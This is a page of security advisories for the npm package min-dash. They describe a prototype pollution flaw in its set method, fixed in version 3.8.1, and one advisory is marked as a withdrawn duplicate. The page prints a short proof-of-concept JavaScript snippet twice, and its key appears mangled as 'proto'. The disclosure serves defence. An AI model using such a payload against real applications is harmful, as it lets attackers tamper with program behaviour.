Advisories for Npm/Min-Dash package

Impact The set method is vulnerable to prototype pollution with specially crafted inputs. // insert the following into poc.js and run node poc,js (after installing the package) let parser = require("min-dash"); parser.set({}, [["proto"], "polluted"], "success"); console.log(polluted); Patches min-dash>=3.8.1 fix the issue. Workarounds No workarounds exist for the issue. References Closed via https://github.com/bpmn-io/min-dash/pull/21. Credits Credits to Cristian-Alexandru STAICU who found the vulnerability and to Idan Digmi from the Snyk Security Team …

The set method is vulnerable to prototype pollution with specially crafted inputs. // insert the following into poc.js and run node poc,js (after installing the package) let parser = require("min-dash"); parser.set({}, [["proto"], "polluted"], "success"); console.log(polluted);

Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-2m53-83f3-562j. This link is maintained to preserve external references. Original Description The package min-dash before 3.8.1 are vulnerable to Prototype Pollution via the set method due to missing enforcement of key types.